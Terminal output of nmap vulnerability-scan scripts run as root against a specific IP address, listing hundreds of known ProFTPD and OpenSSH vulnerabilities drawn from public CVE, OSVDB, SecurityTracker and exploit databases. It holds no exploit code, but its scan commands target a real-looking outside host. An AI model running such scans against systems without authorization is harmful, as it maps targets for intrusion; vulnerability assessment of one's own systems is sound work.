| [20690] wu-ftpd 2.4/2.5/2.6,Trolltech ftpd 1.2,ProFTPD 1.2,BeroFTPD 1.3.4 FTP
glob Expansion Vulnerability
| [16852] ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
| [10044] ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)
| [3730] ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
| [3333] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit 2
| [3330] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit
| [2928] ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
| [2856] ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
|
| OpenVAS (Nessus) - http://www.openvas.org:
Vulnerability
| [63497] Debian Security Advisory DSA 1730-1 (proftpd-dfsg)
|
| SecurityTracker - https://www.securitytracker.com:
| [1028040] ProFTPD MKD/XMKD Race Condition Lets Local Users Gain Elevated
Privileges
| [1026321] ProFTPD Use-After-Free Memory Error Lets Remote Authenticated Users
Execute Arbitrary Code
| [1020945] ProFTPD Request Processing Bug Permits Cross-Site Request Forgery
Attacks
| [1017931] ProFTPD Auth API State Error May Let Remote Users Access the System in
Certain Cases
| [1017167] ProFTPD sreplace() Off-by-one Bug Lets Remote Users Execute Arbitrary
Code
| [1012488] ProFTPD SITE CHGRP Command Lets Remote Authenticated Users Modify
File/Directory Group Ownership
| [1011687] ProFTPd Login Timing Differences Disclose Valid User Account Names to
Remote Users
| [1009997] ProFTPD Access Control Bug With CIDR Addresses May Let Remote
Authenticated Users Access Files
| [1009297] ProFTPD _xlate_ascii_write() Off-By-One Buffer Overflows Let Remote
Users Execute Arbitrary Code With Root Privileges
| [1007794] ProFTPD ASCII Mode File Upload Buffer Overflow Lets Certain Remote
Users Execute Arbitrary Code
| [1007020] ProFTPD Input Validation Flaw When Authenticating Against Postgresql
Using 'mod_sql' Lets Remote Users Gain Access
| [1003019] ProFTPD FTP Server May Allow Local Users to Execute Code on the Server
| [1002354] ProFTPD Reverse DNS Feature Fails to Check Forward-to-Reverse DNS
Mappings
| [1002148] ProFTPD Site and Quote Commands May Allow Remote Users to Execute
Arbitrary Commands on the Server
|
| OSVDB - http://www.osvdb.org:
| [89051] ProFTPD Multiple FTP Command Handling Symlink Arbitrary File Overwrite
| [77004] ProFTPD Use-After-Free Response Pool Allocation List Parsing Remote
Memory Corruption
| [70868] ProFTPD mod_sftp Component SSH Payload DoS
| [70782] ProFTPD contrib/mod_sql.c sql_prepare_where Function Crafted Username
Handling Remote Overflow
| [69562] ProFTPD on ftp.proftpd.org Compromised Source Packages Trojaned
Distribution
| [69200] ProFTPD pr_data_xfer Function ABOR Command Remote DoS
| [68988] ProFTPD mod_site_misc Module Multiple Command Traversal Arbitrary File
Manipulation
| [68985] ProFTPD netio.c pr_netio_telnet_gets Function TELNET_IAC Escape Sequence
Remote Overflow
| [59292] ProFTPD mod_tls Module Certificate Authority (CA) subjectAltName Field
Null Byte Handling SSL MiTM Weakness
| [57311] ProFTPD contrib/mod_ratio.c Multiple Unspecified Buffer Handling Issues
| [57310] ProFTPD Multiple Unspecified Overflows
| [57309] ProFTPD src/support.c Unspecified Buffer Handling Issue
| [57308] ProFTPD modules/mod_core.c Multiple Unspecified Overflows
| [57307] ProFTPD Multiple Modules Unspecified Overflows
| [57306] ProFTPD contrib/mod_pam.c Multiple Unspecified Buffer Handling Issues
| [57305] ProFTPD src/main.c Unspecified Overflow
| [57304] ProFTPD src/log.c Logfile Handling Unspecified Race Condition
| [57303] ProFTPD modules/mod_auth.c Unspecified Issue
| [51954] ProFTPD Server NLS Support mod_sql_* Encoded Multibyte Character SQL
Injection Protection Bypass
| [51953] ProFTPD Server mod_sql username % Character Handling SQL Injection
| [51849] ProFTPD Character Encoding SQL Injection
| [51720] ProFTPD NLST Command Argument Handling Remote Overflow
| [51719] ProFTPD MKDIR Command Directory Name Handling Remote Overflow
| [48411] ProFTPD FTP Command Truncation CSRF
| [34602] ProFTPD Auth API Multiple Auth Module Authentication Bypass
| [31509] ProFTPD mod_ctrls Module pr_ctrls_recv_request Function Local Overflow
| [30719] mod_tls Module for ProFTPD tls_x509_name_oneline Function Remote Overflow
| [30660] ProFTPD CommandBufferSize Option cmd_loop() Function DoS
| [30267] ProFTPD src/support.c sreplace() Function Remote Overflow
| [23063] ProFTPD mod_radius Password Overflow DoS
| [20212] ProFTPD Host Reverse Resolution Failure ACL Bypass
| [18271] ProFTPD mod_sql SQLShowInfo Directive Format String
| [18270] ProFTPD ftpshut Shutdown Message Format String
| [14012] GProftpd gprostats Utility Log Parser Remote Format String
| [10769] ProFTPD File Transfer Newline Character Overflow
| [10768] ProFTPD STAT Command Remote DoS
| [10758] ProFTPD Login Timing Account Name Enumeration
| [10173] ProFTPD mod_sqlpw wtmp Authentication Credential Disclosure
| [9507] PostgreSQL Authentication Module (mod_sql) for ProFTPD USER Name Parameter
SQL Injection
| [9163] ProFTPD MKDIR Directory Creation / Change Remote Overflow (palmetto)
| [7166] ProFTPD SIZE Command Memory Leak Remote DoS
| [7165] ProFTPD USER Command Memory Leak DoS
| [5744] ProFTPD CIDR IP Subnet ACL Bypass
| [5705] ProFTPD Malformed cwd Command Format String
| [5638] ProFTPD on Debian Linux postinst Installation Privilege Escalation
| [4134] ProFTPD in_xlate_ascii_write() Function RETR Command Remote Overflow
| [144] ProFTPD src/log.c log_xfer() Function Remote Overflow
|_

root@blackbox:/usr/share/nmap/scripts# nmap --script vulscan -sV -p22

184.154.192.250

| [44077] OpenBSD OpenSSH up to 4.3 Signal denial of service
| [39331] OpenSSH 4.3p2 Audit Log linux_audit_record_event unknown vulnerability
| [43307] OpenSSH 4.0 unknown vulnerability
| [41835] OpenSSH up to 4.8 unknown vulnerability
| [36382] OpenBSD OpenSSH up to 4.6 information disclosure
| [32699] OpenBSD OpenSSH 4.1 denial of service
| [2667] OpenBSD OpenSSH 4.4 Separation Monitor unknown vulnerability
|
| [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in
OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4
and Fedora 11, allows local users to gain privileges via hard links to setuid
programs that use configuration files within the chroot directory, related to
requirements for directory ownership.
| [CVE-2008-4109] A certain Debian patch for OpenSSH before 4.3p2-9etch3 on etch
| [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to
hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when
another process is listening on the associated port, as demonstrated by opening TCP
port 6010 (IPv4) and sniffing a cookie sent by Emacs.
| [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event
function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems,
allows remote attackers to write arbitrary characters to an audit log via a crafted
username. NOTE: some of these details are obtained from third party information.
| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2)
process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3
and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated
users to cause a denial of service (CPU and memory consumption) via crafted glob
expressions that do not match any pathnames, as demonstrated by glob expressions in
SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-
2632.
| [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for
OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an
externally introduced modification (Trojan Horse) that allows the package authors
to have an unknown impact. NOTE: since the malicious packages were not distributed
from any official Red Hat sources, the scope of this issue is restricted to users
who may have obtained these packages through unofficial distribution points. As of
20080827, no unofficial distributions of this software are known.
| [CVE-2008-3234] sshd in OpenSSH 4 on Debian GNU/Linux, and the 20070303 OpenSSH
snapshot, allows remote authenticated users to obtain access to arbitrary SELinux
roles by appending a :/ (colon slash) sequence, followed by the role name, to the
username.
| [CVE-2008-1657] OpenSSH 4.4 up to versions before 4.9 allows remote authenticated
users to bypass the sshd_config ForceCommand directive by modifying the .ssh/rc
session file.
| [CVE-2007-6415] scponly 4.6 and earlier allows remote authenticated users to
bypass intended restrictions and execute arbitrary code by invoking scp, as
implemented by OpenSSH, with the -F and -o options.
| [CVE-2007-4752] ssh in OpenSSH before 4.7 does not properly handle when an
untrusted cookie cannot be created and uses a trusted X11 cookie instead, which
allows attackers to violate intended policy and gain privileges by causing an X
client to be treated as trusted.
| [CVE-2007-2243] OpenSSH 4.6 and earlier, when ChallengeResponseAuthentication is
enabled, allows remote attackers to determine the existence of user accounts by
attempting to authenticate via S/KEY, which displays a different response if the
user account exists, a similar issue to CVE-2001-1483.
| [CVE-2006-5794] Unspecified vulnerability in the sshd Privilege Separation
Monitor in OpenSSH before 4.5 causes weaker verification that authentication has
been successful, which might allow attackers to bypass authentication. NOTE: as of
20061108, it is believed that this issue is only exploitable by leveraging
vulnerabilities in the unprivileged process, which are not known to exist.
| [CVE-2006-5229] OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms
and versions, and possibly under limited configurations, allows remote attackers to
determine valid usernames via timing discrepancies in which responses take longer
for valid usernames than invalid ones, as demonstrated by sshtime. NOTE: as of
20061014, it appears that this issue is dependent on the use of manually-set
passwords that causes delays when processing /etc/shadow due to an increased number
of rounds.
| [CVE-2006-5052] Unspecified vulnerability in portable OpenSSH before 4.4, when
running on some platforms, allows remote attackers to determine the validity of
usernames via unknown vectors involving a GSSAPI "authentication abort."
| [CVE-2006-5051] Signal handler race condition in OpenSSH before 4.4 allows remote
attackers to cause a denial of service (crash), and possibly execute arbitrary code
if GSSAPI authentication is enabled, via unspecified vectors that lead to a double-
free.
| [CVE-2006-4924] sshd in OpenSSH before 4.4, when using the version 1 SSH
protocol, allows remote attackers to cause a denial of service (CPU consumption)
via an SSH packet that contains duplicate blocks, which is not properly handled by
the CRC compensation attack detector.
| [CVE-2006-0225] scp in OpenSSH 4.2p1 allows attackers to execute arbitrary
commands via filenames that contain shell metacharacters or spaces, which are
expanded twice.
| [CVE-2005-2798] sshd in OpenSSH before 4.2, when GSSAPIDelegateCredentials is
enabled, allows GSSAPI credentials to be delegated to clients who log in using non-
GSSAPI methods, which could cause those credentials to be exposed to untrusted
users or hosts.
| [CVE-2005-2797] OpenSSH 4.0, and other versions before 4.2, does not properly
handle dynamic port forwarding ("-D" option) when a listen address is not provided,
which may cause OpenSSH to enable the GatewayPorts functionality.
| [CVE-2005-2666] SSH, as implemented in OpenSSH before 4.0 and possibly other
implementations, stores hostnames, IP addresses, and keys in plaintext in the
known_hosts file, which makes it easier for an attacker that has compromised an SSH
user's account to generate a list of additional targets that are more likely to
have the same password or key.
| [CVE-2001-1029] libutil in OpenSSH on FreeBSD 4.4 and earlier does not drop
privileges before verifying the capabilities for reading the copyright and welcome
files, which allows local users to bypass the capabilities checks and read
arbitrary files by specifying alternate copyright or welcome files.
|
| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
|
| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
|
| [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
| [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
| [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
|
| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
| [881183] CentOS Update for openssh CESA-2012:0884 centos6
| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
| [870763] RedHat Update for openssh RHSA-2012:0884-04
| [861813] Fedora Update for openssh FEDORA-2010-5429
| [840345] Ubuntu Update for openssh vulnerability USN-597-1
| [840300] Ubuntu Update for openssh update USN-612-5
| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-
qt)
| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow
Vulnerability
| [103503] openssh-server Forced Command Handling Information Disclosure
Vulnerability
| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
| [100584] OpenSSH X Connections Session Hijacking Vulnerability
| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
| [65987] SLES10: Security update for OpenSSH
| [65169] SLES9: Security update for openssh,openssh-askpass
| [61639] Debian Security Advisory DSA 1638-1 (openssh)
| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
| [60667] Slackware Advisory SSA:2008-095-01 openssh
| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
| [57470] FreeBSD Ports: openssh
| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
| [11343] OpenSSH Client Unauthorized Remote Forwarding
| [10954] OpenSSH AFS/Kerberos ticket/token passing
| [10883] OpenSSH Channel Code Off by 1
| [10823] OpenSSH UseLogin Environment Variables
|
| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets
Remote Users Execute Arbitrary Code
| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive
Information
| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote
| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users
Gain Elevated Privileges
| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain
Plain Text in Certain Cases
| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute
Arbitrary Commands
| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the
Monitor to Fail to Properly Control the Unprivileged Process
| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service
and May Potentially Permit Code Execution
| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine
Valid Usernames
| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users
Deny Service
| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local
Copying May Let Local Users Gain Elevated Privileges in Certain Cases
| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose
GSSAPI Credentials in Certain Cases
| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite
Files in Certain Cases
| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous
SSH Services
| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May
Let Remote Users Execute Arbitrary Code
| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose
Valid User Account Names to Remote Users
| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User
Passwords to Remote Users During Man-in-the-Middle Attacks
| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to
Gain Root Access to the System
| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote
Users to Authenticated to the System
| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing
Lets Local Users Execute Arbitrary Code With Root Level Permissions
| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users
Execute Arbitrary Code with Root Privileges
| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute
Commands and Gain Root Access
| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash
the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to
Partially Authenticate When Authentication Should Not Be Permitted
| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides
Remote Users With Information About Valid User Accounts
| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain
Configurations
| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with
Restricted Keypairs Obtain Additional Access on the Server
| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named
Cookies
|
| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function
Calling Local Privilege Escalation
| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation
Remote DoS
| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value
Parsing Remote DoS
| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys
Command Option Debug Message Information Disclosure
| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote
DoS
| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak
Local Information Disclosure
| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication
Bypass
| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege
Escalation
| [56921] OpenSSH Unspecified Remote Compromise
| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context
Disclosure
| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role
Access
| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
| [43745] OpenSSH X11 Forwarding Local Session Hijacking
| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
| [37315] pam_usb OpenSSH Authentication Unspecified Issue
| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
| [34601] OPIE w/ OpenSSH Account Enumeration
| [34600] OpenSSH S/KEY Authentication Account Enumeration
| [32721] OpenSSH Username Password Complexity Account Enumeration
| [30232] OpenSSH Privilege Separation Monitor Weakness
| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
| [29152] OpenSSH Identical Block Packet DoS
| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
| [22692] OpenSSH scp Command Line Filename Processing Command Injection
| [20216] OpenSSH with KerberosV Remote Authentication Bypass
| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
| [6601] OpenSSH *realloc() Unspecified Memory Errors
| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
| [6072] OpenSSH PAM Conversation Function Stack Modification
| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
| [5408] OpenSSH echo simulation Information Disclosure
| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
| [4536] OpenSSH Portable AIX linker Privilege Escalation
| [3938] OpenSSL and OpenSSH /dev/random Check Failure
| [3456] OpenSSH buffer_append_space() Heap Corruption
| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
| [2140] OpenSSH w/ PAM Username Validity Timing Attack
| [2112] OpenSSH Reverse DNS Lookup Bypass
| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
| [1853] OpenSSH Symbolic Link 'cookies' File Removal
| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
| [688] OpenSSH UseLogin Environment Variable Local Command Execution
| [642] OpenSSH Multiple Key Type ACL Bypass
| [504] OpenSSH SSHv2 Public Key Authentication Bypass
| [341] OpenSSH UseLogin Local Privilege Escalation
|_

root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners,vulscan --script-

args vulscandb -sV -p21 184.154.192.250

| [59589] ProFTPD up to 1.3.3 Use-After-Free memory corruption
| [4290] ProFTPD up to 1.3.3 mod_sftpd Big Payload denial of service
| [56304] ProFTPD up to 1.3.3 contrib/mod_sql.c) sql_prepare_where memory
corruption
| [138380] ProFTPD 1.3.5b mod_copy Code Execution
| [81624] ProFTPD up to 1.3.5a/1.3.6rc1 mod_tls mod_tls.c weak encryption
| [75436] ProFTPD 1.3.4e/1.3.5 mod_copy File privilege escalation
| [10259] ProFTPD 1.3.4/1.3.5 mod_sftp/mod_sftp_pam kbdint.c resp_count denial of
service
| [7244] ProFTPD up to 1.3.4 MKD/XMKD Command race condition
| [55410] ProFTPD 1.3.2/1.3.3 Telnet netio.c pr_netio_telnet_gets memory corruption
| [55392] ProFTPD up to 1.3.2 pr_data_xfer denial of service
| [50631] ProFTPD 1.3.1/1.3.2/1.3.3 mod_tls unknown vulnerability
| [46500] ProFTPD 1.3.1 mod_sql_mysql sql injection
| [46499] ProFTPD 1.3.1/1.3.2/1.3.2 Rc2 mod_sql sql injection
| [44191] ProFTPD 1.3.1 FTP Command cross site request forgery
| [36309] ProFTPD 1.3.0 Rc1 mod_sql Plaintext unknown vulnerability
| [2747] ProFTPD 1.3.0/1.3.0a mod_ctrls pr_ctrls_recv_request memory corruption
| [33495] ProFTPD 1.3.0a Configuration File affected denial of service
| [2711] ProFTPD 1.3.0a mod_tls tls_x509_name_oneline memory corruption
| [2705] ProFTPD 1.3.0 main.c CommandBufferSize denial of service
|
| [CVE-2011-4130] Use-after-free vulnerability in the Response API in ProFTPD
before 1.3.3g allows remote authenticated users to execute arbitrary code via
vectors involving an error that occurs after an FTP data transfer.
| [CVE-2011-1137] Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD
1.3.3d and earlier allows remote attackers to cause a denial of service (memory
consumption leading to OOM kill) via a malformed SSH message.
| [CVE-2010-4652] Heap-based buffer overflow in the sql_prepare_where function
(contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows
arbitrary code via a crafted username containing substitution tags, which are not
properly handled during construction of an SQL query.
| [CVE-2010-4221] Multiple stack-based buffer overflows in the pr_netio_telnet_gets
function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute
arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or
(2) FTPS server.
| [CVE-2010-3867] Multiple directory traversal vulnerabilities in the mod_site_misc
module in ProFTPD before 1.3.3c allow remote authenticated users to create
directories, delete directories, create symlinks, and modify file timestamps via
directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE
SYMLINK, or (4) SITE UTIME command.
| [CVE-2009-3639] The mod_tls module in ProFTPD before 1.3.2b, and 1.3.3 before
1.3.3rc2, when the dNSNameRequired TLS option is enabled, does not properly handle
a '\0' character in a domain name in the Subject Alternative Name field of an X.509
client certificate, which allows remote attackers to bypass intended client-
hostname restrictions via a crafted certificate issued by a legitimate
Certification Authority, a related issue to CVE-2009-2408.
| [CVE-2004-0529] The modified suexec program in cPanel, when configured for
mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows
local users to execute untrusted shared scripts and gain privileges, as
demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi,
| [CVE-2012-6095] ProFTPD before 1.3.5rc1, when using the UserOwner directive,
allows local users to modify the ownership of arbitrary files via a race condition
and a symlink attack on the (1) MKD or (2) XMKD commands.
| [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote
attackers to bypass SQL injection protection mechanisms via invalid, encoded
multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2)
mod_sql_postgres.
| [CVE-2009-0542] SQL injection vulnerability in ProFTPD Server 1.3.1 through
1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%"
(percent) character in the username, which introduces a "'" (single quote)
character during variable substitution by mod_sql.
| [CVE-2008-7265] The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows
remote authenticated users to cause a denial of service (CPU consumption) via an
ABOR command during a data transfer.
| [CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as
multiple commands, which allows remote attackers to conduct cross-site request
forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI
that leverages an existing session from the FTP client implementation in a web
browser.
| [CVE-2006-6563] Stack-based buffer overflow in the pr_ctrls_recv_request function
in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to
execute arbitrary code via a large reqarglen length value.
| [CVE-2006-6171] ** DISPUTED ** ProFTPD 1.3.0a and earlier does not properly set
the buffer size limit when CommandBufferSize is specified in the configuration
file, which leads to an off-by-two buffer underflow. NOTE: in November 2006, the
role of CommandBufferSize was originally associated with CVE-2006-5815, but this
was an error stemming from a vague initial disclosure. NOTE: ProFTPD developers
dispute this issue, saying that the relevant memory location is overwritten by
assignment before further use within the affected function, so this is not a
vulnerability.
| [CVE-2006-6170] Buffer overflow in the tls_x509_name_oneline function in the
mod_tls module, as used in ProFTPD 1.3.0a and earlier, and possibly other products,
allows remote attackers to execute arbitrary code via a large data length argument,
| [CVE-2006-5815] Stack-based buffer overflow in the sreplace function in ProFTPD
1.3.0 and earlier allows remote attackers, probably authenticated, to cause a
denial of service and execute arbitrary code, as demonstrated by vd_proftpd.pm, a
"ProFTPD remote exploit."
| [CVE-2005-4816] Buffer overflow in mod_radius in ProFTPD before 1.3.0rc2 allows
arbitrary code via a long password.
| [CVE-2005-2390] Multiple format string vulnerabilities in ProFTPD before 1.3.0rc2
allow attackers to cause a denial of service or obtain sensitive information via
(1) certain inputs to the shutdown message from ftpshut, or (2) the SQLShowInfo
mod_sql directive.
|
Vulnerability
|
| [80980] ProFTPD FTP commands symlink
| [71226] ProFTPD pool code execution
| [65207] ProFTPD mod_sftp module denial of service
| [64495] ProFTPD sql_prepare_where() buffer overflow
| [63658] ProFTPD FTP server backdoor
| [63407] mod_sql module for ProFTPD buffer overflow
| [63155] ProFTPD pr_data_xfer denial of service
| [62909] ProFTPD mod_site_misc directory traversal
| [62908] ProFTPD pr_netio_telnet_gets() buffer overflow
| [53936] ProFTPD mod_tls SSL certificate security bypass
| [48951] ProFTPD mod_sql username percent SQL injection
| [48558] ProFTPD NLS support SQL injection protection bypass
| [45274] ProFTPD URL cross-site request forgery
| [33733] ProFTPD Auth API security bypass
| [31461] ProFTPD mod_radius buffer overflow
| [30906] ProFTPD Controls (mod_ctrls) module buffer overflow
| [30554] ProFTPD mod_tls module tls_x509_name_oneline() buffer overflow
| [30147] ProFTPD sreplace() buffer overflow
| [21530] ProFTPD mod_sql format string attack
| [21528] ProFTPD shutdown message format string attack
| [19410] GProFTPD file name format string attack
| [18453] ProFTPD SITE CHGRP command allows group ownership modification
| [17724] ProFTPD could allow an attacker to obtain valid accounts
| [16038] ProFTPD CIDR entry ACL bypass
| [15387] ProFTPD off-by-one _xlate_ascii_write function buffer overflow
| [12369] ProFTPD mod_sql SQL injection
| [12200] ProFTPD ASCII file newline buffer overflow
| [10932] ProFTPD long PASS command buffer overflow
| [8332] ProFTPD mod_sqlpw stores passwords in the wtmp log file
| [7818] ProFTPD ls &quot
| [7816] ProFTPD file globbing denial of service
| [7126] ProFTPD fails to resolve hostnames
| [6433] ProFTPD format string
| [6209] proFTPD /var symlink
| [6208] ProFTPD contains configuration error in postinst script when running as
root
| [5801] proftpd memory leak when using SIZE or USER commands
| [5737] ProFTPD system using mod_sqlpw unauthorized access
|
